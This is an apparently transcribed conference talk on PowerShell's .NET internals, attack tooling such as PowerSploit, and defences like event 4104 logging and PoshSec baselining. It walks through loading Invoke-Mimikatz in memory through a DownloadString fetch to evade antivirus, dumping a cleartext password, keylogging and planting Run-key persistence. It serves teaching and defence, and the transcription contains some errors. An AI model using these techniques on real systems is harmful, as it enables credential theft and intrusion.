was like 4 of you. Okay, so everyone else go get coffee and then come back and answer my question. Good. Adrian, you let me know when I get started. Okay, cool. So welcome to OISF. This is my first time in Dayton, much less alone OISF. I've known Daryl for a while now. We met last year in Norway. So we flew halfway around the world to meet each other, even though we're about 5 hours away from each other. But it was nice. We went for a nice dinner at a sushi place, so it was nice. I could tell you more about that, but it might not be appropriate for this venue. But this is Hat PowerShell, for those who don't know. My name is Ben Ten. It's not my real name, obviously. It's just an alias, but it's a lot easier than actually pronouncing my last name. I'm a security consultant with BioPoint, which is based out of Auburn Hills, Michigan. So we're a managed service provider, and I've been developing for about 20 years. Started actually when I was 12. So for most people, that's like 4 years ago. And so doing a lot of development, I created a tool called PowerShell Framework, and we'll touch a little bit about that here in a minute. Big time gamer, so I love writing. I love playing games. I love writing games. I love messing with games, writing tools or hacks for games. It's just a lot of fun. Big time geek, a lot of sci-fi, so I can geek it out with the best of them. So for those that don't know, well, first of all, thank you for OISF for inviting me coming down to speak. This was a cool opportunity. As I drove through Indiana, I think I killed about 1,000 of their bugs. They're still on my windshield. So I helped you guys out with that on my way in. But it was a fun drive over, so appreciate the opportunity. And hopefully you guys will get a chance. We'll get a chance after this, sit down, talk. And I want to hear about what you guys are doing too. But for those who don't know, I'm the little guy in the industry. Everyone makes fun of my height, my age, my voice, and that's all perfectly okay. I'm I think the only guy who's over 30 who's ever been carded for sparklers. So the age limit on sparklers, for those that don't know, is 14. So not only was I was carded 3 different times because they didn't believe my original ID. So you guys think it's hard to get a beer? I can't even buy sparklers. So I am pretty young, and then everyone makes fun of me or whatever the case may be. They even photoshopped me on a baby carrier on C-3PO. So this is the big time running time joke, which is perfectly okay. And so feel free to do the same. That's why they asked me for a stool to stand on. The funny thing was at DerbyCon 2 years ago, they made that joke. And I actually needed a stool because this presentation thing was like up here. So I really did need a stool for that one. So I do have a disclaimer. I know that they kind of went through their little disclaimer here, but this is mine. Yes, that's Lorem Ipsum. So it's out of the way. It's done. No, in all reality, I am going to show you some tools. Some of these tools can break your system, whether it's a denial of service attack, whether you blue screen, whatever the case may be. So use at your own risk. I would hope that if you're going to mess around with these tools and you have not done so before, that you're going to do it in a virtual environment where you cannot damage anything. If you choose not to do so, that's not my fault. So just make sure you understand that. Obviously, I'm going to show you both defensive and offensive tools. So yeah, keep that in mind. This talk is not an intro to PowerShell. So if you've never touched PowerShell before, if you've never done any development or whatever, I'm going to be going a little fast. I'm going to try and keep it, semi-intro, but that's not what this talk is. I did give this talk last year at DerbyCon. So if you want an intro to PowerShell, Adrian recorded that and posted that. So if you want to have a walkthrough on, you've never touched PowerShell before, in 50 minutes, I walk you through never seeing it before to actually writing a tool that you can use in your environment to find out whenever any files have been modified or changed. Cool forensic utility that I teach you how to do in 50 minutes. So you can go to ben0xa.com, or if you want to type that ridiculous link for YouTube, you can. So, but if you want to actually learn PowerShell, I'd encourage you guys to take a look at that talk. It's a lot of fun. Dave Kennedy even comes up behind me in the middle of the talk and scares the crap out of me. So that's fun. All right. So what are we talking about today? We're actually going to look at .NET. So before I really get started, I don't like to do polls, but I need to know. How many of you guys have done any development whatsoever in PowerShell? Like just whatever. Okay. So less than 10% of the room. How many of you guys have never touched PowerShell before in your life? Okay, so that's the majority of you. Okay, so I'm going to do my best to help you guys understand. How many of you guys have done any .NET development at all? Okay, so that's not too bad. All right, good. So we're going to talk a little bit about .NET. PowerShell is .NET. It sits on .NET. In fact, PowerShell, the entire thing, is just a DLL file. It's not a application or anything. And I'll go into a little bit more about that. We'll talk about some offensive tools that we have. We'll talk about defensive tools, some resources that you can do, and then we'll go into Q&A, and then I'm big into hugs, so please come up and hug me. All right, so we need to get down and deep and dirty into .NET. This is really where I think a lot of people misunderstand what is actually happening within PowerShell. They think PowerShell, they look at it and they're like, oh, I know VB script. I can do PowerShell just fine. No, you can't. VB script is the bane of existence and should not only be used on a red team exercise to launch your PowerShell. But what I want you to do is I want you to actually understand what's happening in the background here. Now, obviously, you know that PowerShell is a Microsoft product. So we have our lovely Bill Gates. And, it is a Microsoft product. And it's actually been out since 2006. It's only recently begun to gain attraction over the last 3 or 4 years now. And most people, they looked at PowerShell, they're like, oh, well, it's just another VB script. I don't have to learn that. I don't want to learn that. Now, how many of you guys actually think that you can continue doing your job for the next 5 years without PowerShell knowledge in a Windows environment? You're right. Nano server, Windows 2016, it's all going to be managed with PowerShell. So if you've been waiting to jump on the board, now's the time. Because if you want to use any of the new technology that they're about to roll out, you're going to have at least some basic understanding of what PowerShell is. So if you think you want to do a Windows admin or Windows maintenance or whatever, and you think that you can do it without PowerShell, you're gravely mistaken. So if you've been waiting, now's the time. Yeah. Feel free to interrupt. No, it's because of what they're trying to do is they're trying to create things a lot slimmer. So what they have are virtualized environments. They're called nano servers. And so what they basically do is you don't spin up an entire operating system anymore. You spin up small individual compartmentalized systems. So if you want an SQL server, you don't need an entire 2016 server to run that. So you just spin up a small nano. And it's segmented. It's actually very secure because you're segmenting different parts of your environment instead of having your domain controller, your SQL database, your access database, and your web app all on one box, which is a big problem for a lot of organizations because they don't have a lot of money. Well, now with the nano server, you actually just spin up a new nano instance. There is no keyboard and monitor interface, though. There's no console. You actually have to remote into the box to turn it on. And it's all PowerShell. So if you want to spin up a nano server, you need PowerShell. Now they have helper tools and scripts and things that you should be able to do that. But understand that most of all the management and everything that you see is going to be coming through PowerShell. And I'm going to show you some cool things that you can do, even with Windows 7 and XP now, that I think most people, when I gave this talk last time, they had no idea that they could do. So before you create a tool, no matter whether it's Python, Ruby, whatever, you have to actually understand the language. More than just, I want it to display hello world. Well, PowerShell, as easy it is to get started, there's a lot more power to it, and most people don't understand what's actually happening out in the deep underbellies of .NET. So PowerShell sits on .NET. It's a DLL. It's not even PowerShell.exe. It's really not PowerShell.exe. PowerShell.exe is just a host application. It does nothing but communicate between you and the DLL. You can run, hey, Dave. Everyone turn around and say, hi, Dave. That was like 4 of you. Thanks, guys. Appreciate it. So PowerShell is just a host application. It only communicates between the user and what's happening in the background. You can run PowerShell without PowerShell.exe. How many of you knew that? Yeah. You can run PowerShell without PowerShell.exe. It doesn't have to be present. So if you're using AppLocker and you're like, oh, I'm going to shut down these bad hackers, you're not going to be able to do any PowerShell exploits on my system. Lock PowerShell.exe. You haven't solved anything because we can still run PowerShell without it. So this is kind of the way it works. So this is what you see. Can you see my mouse up there? Oh yeah, you can. Yay! So this is what you see. there's a host interface. This is PowerShell.exe. It communicates with the dynamic link library, which handles what's called a run space, a pipeline, where all of your individual functions, scripts, and outputs now happen. Now, I'm not expecting most of you guys to truly understand all of the pieces of that, but just understand that this is the only thing that PowerShell.exe is just a host interface. That's all it does. So we put all of our commands, scripts, and everything in here. We just use a host interface to display it to the screen. So let me kind of show you what's going on with that. So, all right. So this is PowerShell.exe, obviously, right? So if we look at, get date. Yay, get date. Okay, so that basically just displays the date, no big deal. So we think that this is PowerShell and everything's here. Well, the thing about it is that you can actually do this without having the PowerShell.exe. So I'm going to show you that here. And my talk time got bumped up a bit, so you'll have to excuse me. I had to get everything started really fast. So I created this thing called the awesomer shell because it's awesomer than the regular shell. And I'm gonna explain the code. Okay, this is a C# application, and what we've done is we've hooked into the system.management.automation DLL. The system.management.automation is PowerShell. It's all of the automation pieces. It's everything that you have on there. And if you have .NET or WMF, which is Windows Management Framework, you have this file. So let's look at the program real quick. And if you've never programmed in C, it's no big deal. I'm going to explain what's going on here. So we hook into the automation file here. Can you guys see that okay, or is that really dark and is good? I don't need to update, right? I'm good. All right. I'll patch later. So we hook into the automation. Let's see if can we make the font bigger? Are you guys okay back? Can you guys see in the back? You're good? Okay, I don't have to make it bigger then. So we hook into the automation, and then what we do is we just display this. We make it look like it's an application. So I read any text from the line. I don't do any input sanitization whatsoever, so it could totally break my code. I don't know, but I don't care because you guys are only going to use my program the way it's intended to be used for. Then I create what's called a run space. Do you remember that diagram I showed you earlier? So I'm going to create this run space. And then I'm going to create a pipeline, and then I'm going to put the commands within this. Okay? So I create the run space. I open it up, and I say PowerShell.create. Now, PowerShell.create is this great little utility that will set up your pipeline, it'll set up all the commands, and it'll hook into the run space that you guys currently have. Really nice, easy function. Now, there's a longer way to do this. You can go through the process of creating an individual pipeline and setting up the environment and controls and using in configuration. You can. You don't have to. So they wanted a quick and easy way for you guys to get this up and running. So then I add my command. Now, the command was whatever I pulled in from you guys. Then I invoke it, and then I display it to the screen. Okay? And then I say press any key to get. It's just a quick little demonstration about how to take a command from a user and then run it through PowerShell. Now I'm going to exit out of here, and I'm going to open up the task. So I'm going to scroll down, and we're going to leave this on top because what I want you to see, put that right there, on top. Okay, thanks. What I want you to see is that at no point will you see PowerShell. And if you do, let me know, and I'll buy you a beer. Okay? All right. So here's our little awesomer shell. It pops up. It's got the APS. Okay? Anyone see PowerShell yet? No. So if I type get date, which was the same command that I did earlier, it's going to open up the run space, create pipeline, send it out to PowerShell, come back. Anyone see PowerShell load? Nope. So the point what I'm trying to get to you is that PowerShell is more than just the host application, which is PowerShell.exe. You can do monumentally more once you actually start hooking into the .NET application. So you can control the run space, you control the pipeline, you can do basically so much more than what you actually think. How many of you have heard of, yeah, go ahead.
What service did start? Because I didn't notice the flash.
What, huh?
Whenever you executed your program, it actually, some services changed. It just scrolled up, scrolled back down. So something got added.
I don't know. I don't know. Yeah, I don't know, but PowerShell itself did not launch. So, and that's the big thing here is that, because a lot of times when people try and do the thing, they'll do PowerShell, and then they'll do the command, and whatever the case may be. Well, that will actually launch PowerShell for you, because you're actually launching the binary. So, the thing about it is that you don't need the binary to do a lot of the tools. So, there are some defensive capabilities against this, but if you're just focusing on PowerShell.exe, that's irrelevant, because I could wrap the entire thing I've done in another binary that you've got, and it's going to run in the background, and you're not going to see it. Okay? So that's the power of PowerShell, the power of .NET, and some really cool exploits that go along with this, but there's also some neat defense stuff that goes along with it. All right. Any questions so far? Have I lost half of you? Good. Perfect. All right. So I had these in there just in case. So this is the code that we were talking about on how to actually create an instance of PowerShell within PowerShell. So let me show you that. We get a little inception thing going on here. So if I do, let's do PS equals, do you remember this from the code we had earlier where we did PowerShell.create? You guys remember that? So I'm actually going to do that here. So what I've done now, if you do this get member, it's a neat way to see what type of object you're dealing with. So you can see that I'm dealing with PowerShell. So I'm going to do the same thing I did before, add command, get date. Okay, so it says, yay, you added a command. Good job. And then if I say ps.invoke, there you go. So the funny thing is that that invocation did not happen within PowerShell.exe. It happened within a separate run space. So I'm actually within PowerShell, within PowerShell, within PowerShell. So it's totally inception. Time does not slow down, though. It's the same time. All right. All right. So we talked about this. We talked about the Awesomeness show. So now we're going to talk about some cool offensive tools. There are some great tools out there. I know Dave has written some too, but there's actual projects that are solely around all of this, specifically PowerSploit, which was written by Matt Graber, Chris Campbell, Veil, PowerView, and PowerUp, which was by Will Schroeder. Will has been working very closely with Raphael Mudge. He's got a lot of the stuff within Armitage. So if you've been using Armitage for any of your tools and you use any of the PowerShell stuff, that's really where it's coming from. And then PoshSecMod, which is Carlos Perez. Now Carlos actually, he's got like 60 different PowerShell things that he's working on. So I could only really cover one. We don't have time to go into each and every one of these. So for in the sake of the time that I've got, we're really just going to look at PowerSploit. As far as red team exercising and pen testing, they've got a lot of great tools that they've developed. They're actually working directly with Microsoft on Windows 10 and Windows Server 2016. Microsoft reached out to them specifically to see if the security controls that they've been building in have actually been working. So it's really cool. Microsoft is coming a long way. I'll show you a little bit about that in a minute. So these are all the different modules and stuff that you can have with PowerSploit. But you know, again, I don't have time to show you every single one or how each one of these could possibly work. So what we're going to do is we're actually hold on. Before I show you the demo, I want to highlight something. So Symantec recently began tagging PS1 files, which I thought was cool. So if you have invoked Mimikatz or you have any type of get keystrokes or whatever, they're actually going to flag it. And so now, so I use Symantec just because I've been using them for a long time. Not to say it's right, wrong, or otherwise, but one day I was sitting there and I was messing around, and all of a sudden it popped up and deleted my file. And I'm like, what the? So sure enough, they've already began signatures for a lot of the Mimikat stuff and get keystrokes. So if you're going to use some of these tools in an engagement, you want to avoid writing any of these tools to disk. Okay, so that doesn't mean you download the PS1 file and then you load it into PowerShell using the import module command, because that's typically how you would do it for those that don't know. So there is a way that you can get around this. So when you do PowerShell, typically, okay, so like there's PowerSploit there. So if I wanted to import PowerSploit, I would say import module PowerSploit. All right, so then if I do get command, module, PowerSploit, you can see I have everything except for invoke Mimikatz, because semantics already wiped it off of my box. So I don't have invoke Mimikatz. If I try and download the file, I've got semantic running right here. So if the moment that thing hits disk, it's going to flag it and then remove it, so I can't really do anything. There is a way to get around this. You can do invoke expression, new object, net.webclient, download string, and then you can just put the URL. Now, we already know that he's got this hosted on GitHub, so raw GitHub user content.com, manifestation, PowerSploit, PowerEsploit, master, exfiltration, invoke Mimikatz.ps1. And I'm expecting you guys to just remember that. Okay? All right, so now if I do get command name invoke Mimikatz, there it is. Yay! And no, I'm not running it on this box because you cannot have my passwords. So let's go ahead and take a look at it on my Windows 12 box over here. So we've gone ahead and got that already over here. Oh, name. Okay, so invoke Mimikatz. All right, so this is Windows 2012, fully patched, everything else like that. I don't even know if it's a legit license or not, but it's fully patched. So if you look here and we go up, you can see, oops, there's my password. And I did this demonstration at ShowMeCon. I didn't have time to change the password for you guys here, but there's my password, nice and clear. It's a decent password. It's not super awesome, but still, it's not password 1. So pulled up the password, no problems, whatever the case may be. So I do want to pause and talk about this specific instance when it comes to Windows 10 and going forward. So Lee Holmes is one of their top security guys when it comes to PowerShell over at Microsoft. And he reached out to Matt and Chris and even Ben, and they're like, hey, we want to make things better. And so they worked specifically with them on a lot of these tools. So Windows 10, even in their preview, they worked with them very closely to prevent this from actually happening. So if we invoke Mimikatz on our Windows 10, ignore the error. But as you can see, there's no password. So Microsoft is coming a long way. They're really trying hard to ensure that, when you guys upgrade to 10 and when you come around, that they're not just thinking about what might be good security. They're working with the people who are trying to get around it and trying to make things better. Now, that's not to say that this is bulletproof and that someone's not going to find some way to break into it, but this is at least efforts on their side to really say, hey, we want to make sure that things are going right. So on the Windows 10 environment, the invoke Mimikatz is no longer working. So I do want to show you one other tool from the PowerSploit thing that's really cool, is the get keystrokes. Let's see. Oh, that's right. They wiped that, semantic wiped that out on this one too. All right, hold on a second. Let's do it on this one. Okay. Oop. Okay. So this is a cool little way that Matt and his team, basically, if you're able to get something running, but you haven't been able to pop the box or whatever the case may be, oftentimes you just want the keystrokes to go on. So, obviously, if you, if you're in an IT environment or whatever, hey, this is Ben, your new account. Awesome. Ben is set up. The password, according to company password complexity rules, is this password is really long and super secure. 1111. Yes. November 2015. There. Okay? So if we look at this log now, though, you can see everything that was typed. You can see the backspace. You can see any type of space, shift, tab, whatever the case may be. Now, the only issue that Matt did identify with this is because of the way he's hooking into the reflection DLL, it's actually causing it to be in there twice. So he's already aware of this issue. I talked with him about it. I'm like, yeah, I'm going to do a demo on this, and it shows everything twice. He's like, yeah, I'm working on it. So, but it is there, so as long as you know that going into it. So, how do you detect this? Anyone know? Anyone have any idea? If I'm on your box, how do you detect it? Okay, so Windows 10 is actually doing a decent job. They've actually created a special event viewer just for PowerShell. So if we come down here to Applications and Service Logs, we open up Microsoft. Is this the one? No. Windows. And we go down to PowerShell, and we look at operational. So we look at, let's see. There is a 4104 event. Sorry, guys, hold on. Oh, so there is a 4104 event that will actually show up in the event log, and that will show you all the commands that they just did. Now, I just did a whole bunch of stuff, so maybe it's hidden in here. And that is one of the issues that we actually highlighted with Microsoft saying, we can flood the log, and it makes it very difficult to find what you guys are trying to check. But basically, what they're trying to do is that anytime that you hook into the reflection, anytime you hook into anything within Microsoft, it's actually going to put an event. So what you do is you send all these event logs off the box, and then you correlate it, and then you create a detection signature for whenever you see something like that. So if Daryl in accounting, who doesn't know anything about technology whatsoever, if he all of a sudden his box starts launching PowerShell stuff, that might be an indication that that box is compromised. Or it could be some utility, because a lot of software is using it, but unless you know what's going on, you're not going to be able to detect it. And the reason, I did this on my Windows 2012 box, so that would be part of the reason why you didn't see anything. It's in Windows 10. So let me see if I can show you real quick. That's okay. We'll continue on. All right, so let's talk defense. So I'm big deep blue guy. I like blue. I started in blue. I like keeping things safe. I enjoy doing some red team stuff. Recently moved over to the testing team at my current company. So it's a lot of fun. It's really neat to break the box, but I really like protecting people too. I like being able to go in and saying, "Ha, I stopped you. You can't get in." And that doesn't always work, but at least I'm able to detect what's going on. So there are some projects out there. One is PowerShell, which is myself and Matt Johnson. We've been working on that for a few years now. There's also Kanza, which is created by Dave Hull, which is some of the newer projects that are coming out. And then there's a incident response and forensics tool called InvokeIR and Power Forensics by Jared Atkinson. And they are doing fantastic work. And we're kind of all working together, like we have our individual projects, but we really want to work together because we want to make sure that if you utilize any of these tools, that it's seamless between one to the other. So we're trying to have command confliction and stuff to that effect, so that way we can provide all of this for you. And one of the things, our goals, is to put this into the PowerShell gallery, which is basically, you say, it's like a repository for the Linux people, where you can just say, get PoshSec, or get Kanza, or whatever, and it's going to pull it down. It's going to be signed by Microsoft, secure, so that way you're not just getting some free and open source tool, you're actually getting something that Microsoft has agreed should be a part of the systems. So we're working really hard to make this more available to you guys so that you can just deploy some of these tools. So again, I don't have a lot of time, so I want to make sure that we get some, at least look at what PoshSec is doing, so we can kind of further go into everything that's there. Okay, so we talked earlier, and we said that, you know, awesomer.exe was just the host application. So, you know, I realized this early on, and so I created this tool called the PoshSec Framework. Now, PoshSec is just a series of tools and commandlets that is meant to create a baseline of your system, right? So how many of you guys are into baselining at all of your critical assets? 2? How many have no idea what I'm talking about? Okay, so baselining of your systems is basically saying, I want to know what this system looks like at this point in time. It could be completely owned, right? It could be completely popped, whatever the case may be, but at least I have a baseline of what it is. So I know that I have, you know, 200 applications installed. These are the common ports that are being used. This is the current file structure, whatever the case may be. Then you monitor that baseline over a continuing period, whether that's weekly, monthly, daily. Any deviations, additions, deletions, should cause an alert. Adding a new run, like for example, your startup applications in your run registries, right? How many on your critical assets? I understand some of you guys might have 40, 60,000 assets, right? On your critical assets, how many know for sure everything that's in the run keys of the registries? How many of you guys have anything right now monitoring those? Those are your persistence modules, things that are going to start up. Typical malware and things that want to have the persistence, they're going to use that. There's other places they can hide it too, but let's just focus just on the registry key. Anyone doing anything with that whatsoever? Yeah, and how many think that's a problem? Okay, good. I'm glad that you're with me. All right, so I'm going to show you something neat. How many of you guys know what I just did? Anyone? Who said it? I'm in the registry. So now if I do, let's see. See? I can even CD. Obviously, I don't have anything in my. Let's go to. Oh, it's wow. It's tab. There's tab complete, by the way, as well. So the whole idea is you can go through, and I think it is. Get 1 second. All right. So if we come over here and we look at our registry edit, so here's my run. Here's all the keys that I have in here. So this is going to be in my WoW 6432 node, Microsoft Windows Converged Run. This is where I am. So if I do, I'm just going to pull this up just so I have the command in front of me. Can't remember everything all the time. And we do new item property. We're going to say in the default path of wherever I am, we'll give it a name of not a virus. Value C PSF not a virus.exe, and we'll use a force parameter just to make sure it goes in there. So now if we come over here, we refresh, there's my not a virus. Okay? So, how do you check that? So let me go ahead and remove this, and I'm going to show you this neat little tool. It's called the PowerShell framework. The PowerShell framework, what was designed was to be a PowerShell, so I created my own host application, just like we just demonstrated before, and it runs in its own environment. You can run multiple scripts, multiple PowerShell things all at the same time, and we link in with PowerShell mod, PowerShell SSH, PowerSploit, and PowerShell. So it's directly linked with GitHub, so you can actually download the GitHub tools that you see from Matt or whatever. You just put in the URL to what you want, and it'll download it, load it, and put it into your environment for you. So you don't have to worry about maintaining those modules, and if it ever gets updated, it'll give you an alert. So you can go out and say, update. So it'll check for updates for you. So it's the whole idea was that it's meant to be easy, especially for those who haven't used PowerShell. Yeah. Yeah. So it will load to disk, and so those are the whole ideas. But if you know that going into it, you can also build in an exception within your AV. So, but yes, so that will just load it to disk. So it doesn't just load everything in memory. But one of the things that we like to do is the baselining. And so what we have here is we have this thing called startup programs. So I have this little script, and it runs, and I say, okay, so show me all of my startup programs. So I'm going to choose my computer. And so it basically pulls out everything. So it looks in both the current version run, everything that's here. So it kind of gives me a list. So, oh, look, there's my not a virus. Because I actually already have one in pwned. So anyways, so I'm already pwned, but at least I have a baseline, back to my original point. So at least I can actually see what's going on. So I want to maintain this and monitor this. So I actually have a thing called monitor startup applications. And what this does is it's just a script that's just going to do exactly what I just did. It's going to check for any deviations, additions or deletions, and then it's going to create it's just a PowerShell script. So it's just going to monitor that, and anytime there's just an addition or deletion, it's going to highlight it. Well, with this, I have this thing, it's basically like an alert system. So if that ever changes, then it'll actually pop an alert. So what I'm going to do is, I created this ability that you can actually create a tab, but I'll show you that later. So let's go ahead and monitor it. And I'm going to say, my baseline file is going to be, let's just put it here. Startup baseline, and we'll say run. So if you look down here, oh, it created the baseline. So monitor startup applications, baseline file. Okay, so it's created the baseline. So I have it and ready to go. So let's go back to my command. And we're going to create this new item property, right? Right? So this is the one we created, the not a virus. Oh, did I have clear? Oops. Thanks. So now if I run this again, so monitor startup applications, I'm going to compare it to my original baseline. Boom, program added. You see that? And there you go, all PowerShell. So not only are you now monitoring a baseline, but you now have a way to actually alert on those things. So you can set this up on a scheduled task and have it monitor on your critical assets. I'm not expecting people to do this on all 40,000 of their assets. That's impractical. It's just not going to happen. If you're doing defense with the intent of never getting breached, you're not doing defense right. Part of me actually likes the idea of setting up a box that is completely open with a valid admin password that's only on that box. That way, you set up an alert that in the event that you see any login or anything from that box, you know that somebody's using your system that you shouldn't be. Now, I'm not saying you just don't employ security, but don't expect that somebody's not going to get in. If they're persistent and they're really good, and you have users who like money and are willing to be bought off, they're probably going to get in. So defense is not about keeping them out. It's just about knowing when they're there. And that's the main point. And so that's what PowerSec is trying to do. PowerSec was actually created by a guy by the name of Will Steele. And he had this passion about defense and security, and he really wanted people to be excited about what was going on when it came to a lot of the security pieces. And the unfortunate reality is that Will died about 2 years ago before he could see it come to fruition. And so his wife, was working with Matt, and Matt took up the project. And he's like, no, we're going to make this. We're going to do this because we care about what Will wanted to do. Will was tired of seeing people get popped just because they didn't have a simple baseline, that they had no idea what was going on. And so I joined Matt's team, created the interface just to make it easier for those who didn't want to use the actual PowerShell command line. And we were able to hand version 1.0 to his wife. And it was a big moment. It was Will's last thing, is to say, I want to give something to people that's free to help them out. So that's why I'm on this project. And I know that for a lot of my talks, I've really been talking about it, but I don't think people understand just how powerful just baselining can be. It's not a tripwire. It's not a semantic thing. It's not a blinky box, right? And there's some fantastic tools, fantastic things out there that are really going to help secure your environment. But not all of them are going to be if it's not configured correctly and you don't have the box at the right point on the right span on the right VLAN, it's still not going to work effectively. So if you just begin baselining, especially on your Windows boxes and your Windows system, you begin baselining and just watch for the deviations on that, you actually get to learn a lot more about it. And that's what we want to do. And that's what we're trying to push. So if you look at PowerSec, is it really going to stop an intruder from breaking in? Absolutely not. They're still going to get in. They're still going to have fun. But hopefully you've got this set up to where you can actually begin to see, is there any new processes running? Is it connecting to some weird port? Is there any persistence set up? Because for persistence, it has to be somewhere. And there's many different places, win.ini and whatever the case may be. So you can do way more, but at least on this piece right here, if you look at a lot of the malware, this is where the persistence is going. So at least at this point, begin to monitor your systems and know what's going on so that you can actually begin to have an idea of better being able to defend yourself. So one of the other things I wanted to show you, there's more to the PowerShell, than just the defense and offense. Sometimes you just want to have a little bit of fun. And so one of the things that I did is I created this. You can launch Windows Media Player in the background. And so I loaded a fart MP3 on the shared drive, and then I would send it to my guys, and I would have it play the fart sound randomly on their computers. So, you can do a lot more fun things and everything else like that. But there's also this Kraken. So did you guys see, I just put in the GitHub, this thing called Kraken. It'll actually pull down any type of branch repositories you might have. So you just hit OK. So there's Kraken. You hit OK. Reloads your entire environment for you. So you've got all your new stuff. And I've got this unlock the Kraken. And so one of the things that I wanted was the ability that in the event that I saw a compromised box, but it was after hours, right? I wanted that box off my network, at least until I could get in there and figure out what's going on. So I created this unlock the Kraken, which will actually go out. It'll enumerate every single local area connection on the box and disable everything. So basically, it's just like a kill switch. Now, you can point this at your entire Active Directory domain, which will mean some poor sap will have to walk around to every single computer to re-enable those because there's no remote management anymore because you've disabled every interface. But this is a kill switch. And so that was my intent, was that in the event that I saw a box, something was going on, we actually had a pen test team come in one time from one of our clients, and we had a site-to-site VPN with them. But I don't know if they didn't define the scope appropriately or the team didn't state a scope because they pivoted from their internal network over to mine, and they began attacking my boxes. And in that situation, I shut down the box. And I did it from my house, just unlock the Kraken. I thought it was cool, the whole Pirates of the Caribbean thing. So it's just basically, I want the box off my network. So you just point at it and say, unlock the Kraken. And it's cool when you go into a post-mortem meeting and you're like, yeah, we released the Kraken. It was good. So that was the whole idea, is that, it'll just enumerate, shut down everything. If I do it now, it'll actually kill all of my connections. So you guys can play around with that on your own, hopefully in a test environment. Again, the disclaimer, lorem ipsum, right? All right, so, yes, thank you for asking questions, by the way. I'm sorry? Yes, this is what Wall Street is using. They're big PowerShell fans, let me tell you that. So let me see if this popped up here, because I want to show you this defense tool that Microsoft is working on. So Lee Holmes not only reached out to Matt Graber and Chris Campbell, who created PowerSploit, they actually reached out to myself and to Matt Johnson, just because of our work on PoshSec and trying to do everything that they've got going on. And they said, hey, we've got this, and these are the 4104s, by the way. So here, I want to show you this. This is what I was trying to show you earlier. You guys can see that it basically, anytime that you do one of the commands, it's actually going to pop it up in there. So what you do, hopefully you take your logs and send them off of the box so that I can't flood them or I can't erase them, right? So if you guys are doing event log monitoring, you shouldn't just be pulling from the box. They should be sent to a centralized location. So first and foremost. Secondly, anytime that one of those commands pops up now with the Windows 5, and this comes native in Windows 10, the Windows Management Framework 5, Windows 10, is that it's gonna log these for you. And so, they reached out to us and they said, hey, we've got this cool new logging device, see if you guys can get around it. I got around it. So I have a full bypass for this, which is going to be patched here shortly. Once that's patched, then I'll release the paper on it. There is a full bypass for this right now, but they're being intentional. Before they release this, they're reaching out to the security people. And I know that a lot of people are like, Microsoft is horrible. They've actually come a long way. And I think that they're getting a lot of things right. They're not perfect, whatever the case may be, but I think that, because they're reaching out to the environment or the community, when they put security in, they're not just like, oh yeah, this is awesome, we rock. They're like, we're not sure if this works. You guys will probably break it, but let us know anyways. And I think that's cool. And we have to give at least some kudos to Microsoft for at least taking those steps. But this is one of the great things that you guys can do. If you are concerned about some of the tools that you've seen, someone putting stuff on, you're going to be able to catch this. Because if we're on your, an attacker's on your box or a pen tester's on your box, if you drop a binary a lot of times, yes, you can do your own encoding, whatever the case may be. But oftentimes, if you have AV, and AV is not perfect, but AV does catch a decent amount of stuff, your binary is not going to go anywhere. PowerShell is a great tool. Load it right into memory, as I just showed you. Nothing's written to disk, but this is your compensating control right here. So take these logs, send them off to a centralized location, and look for these 4104s. Now, they do have to refine this a little bit because everything's a 4104. Even the PowerShell started up. I'm like, no one's going to sit here and dig through all of these logs. But they are working to try and refine this a little bit better, so that way you guys can have a better handle of what's going on in your environment. So that way with Daryl in accounting, who knows nothing about PowerShell whatsoever, and he just loves crunching numbers, all of a sudden his box starts spitting out some PowerShell commands. At least you guys have an idea, hey, we need to go figure out what's going on. Why is this box all of a sudden doing PowerShell? and do we need to do anything about it? All right, so we looked at that. So these are some resources. This is where you can go and grab PowerSploit. It's on Manifestations log on GitHub. Everything I've shown you today is free. PowerShell framework, free, open source. I give you the entire source code to the GUI. So if you ever want to create your own host application or whatever, just go and take from it. Just do attribution. Veil Power View Power Up. It's again on GitHub. PoshSec mod, which was from Carlos. Carlos has done a lot of work on the PoshSec mod. And I wanted to show you guys some of his stuff today, but he said he was doing some changes to it, so I did not get a chance to do that. PoshSec is on github.com/PoshSec. Kanza is at Dave Hull. And then the Invoke IR. I would have loved to have shown you some of the neat and cool things that everyone's working on, but we don't have enough time. So questions? Yes?
With so much of the Windows underpinning depending on PowerShell,
Mm-hmm. Yes, absolutely. And that's part of the reason that you saw the event logger for the 4104 is because, again, for at least when it comes to the PowerShell stuff, I mean, I could have just a benign application, awesomer shell, right? No one has a signature for awesomer shell, right? So, but yet I could still put PowerShell in there. Now I can do all the nasty stuff with PowerShell, and you have no idea that I've done it. And it's a binary, it's .NET, so that means it doesn't need to install, which means your user at local level can run it, right? So unless you really have no processes whatsoever, unless these 5 listed, which I doubt any of you are doing, because that would, the business has to operate and run, right? So I doubt any of you are doing, there's only these applications and nothing else can start up, nothing whatsoever. Unless you're at that point, you're going to have to go to the event logs, to really check and to identify and see what these are going on. Windows Management Framework 5, so if you guys go and patch that, you'll get the logging before you go to Windows 10. So the logging is already there in WMF5. So if you want the logging, get WMF5, or wait until Windows 10 or 2016 server. Any other questions? Yes, sir. Mm-hmm. So I'm not recommending necessarily anything just because everyone's environment is a little bit different. For me, I use PowerShell and PoshSec. So if you're asking me, I'm gonna use my own tool. Like when I load up when my box starts up, PoshSec starts up because I want to have that persistence. I want to at least baseline my box. I take this thing to HackerCons, so the last thing I want, is someone to drop something, like Dave Kennedy, to drop something on my box, and so at least I have an idea of what's going on, right? So is it a little bit tin hat? Perhaps, but I like knowing what's going on. You think about it like your house. When you walk out of the door, close the garage, most of us, we check to make sure the garage door closes all the way down because sometimes a trigger happens, right? So we want to make sure that happens. We come back and the garage door is open. You're like, that wasn't right. Well, at least we knew that the garage door was closed. If we just drive away without knowing, we had no idea whether the garage door closed or opened, right? You created a baseline driving away. I know the garage door is closed. I know I locked everything. I have everything set. The alarm is set. But if you don't create that, if you're not in the habit of actually saying, we're secure, this is where we should be, then how will you know when something changes? And again, I know a lot of you have 40, 60, 120,000 assets, whatever the case may be. And some of you don't. Some of you maybe have only 1,200 assets. You focus on your critical stuff first. You don't need the high noise to signal ratio because you don't have enough time to do it in the beginning. But go for your servers. Get your 400 servers. Baseline the crap out of those things. Whenever those things change, you guys should have an incident response plan to say, let's look at this, let's see what's going on, figure out what's going on, figuring out why that changed. Why is there a new startup application? We actually found Citrix hiding a binary in one of their connection programs that set it to start up at the beginning that was doing a local loopback connection and listening for incoming connections for remote management. Citrix. I thought I was owned, right? Because it was outside of my baseline. All of a sudden, this thing's listening on a random port, and now it's in the run registry. But we found this out. It was some stupid 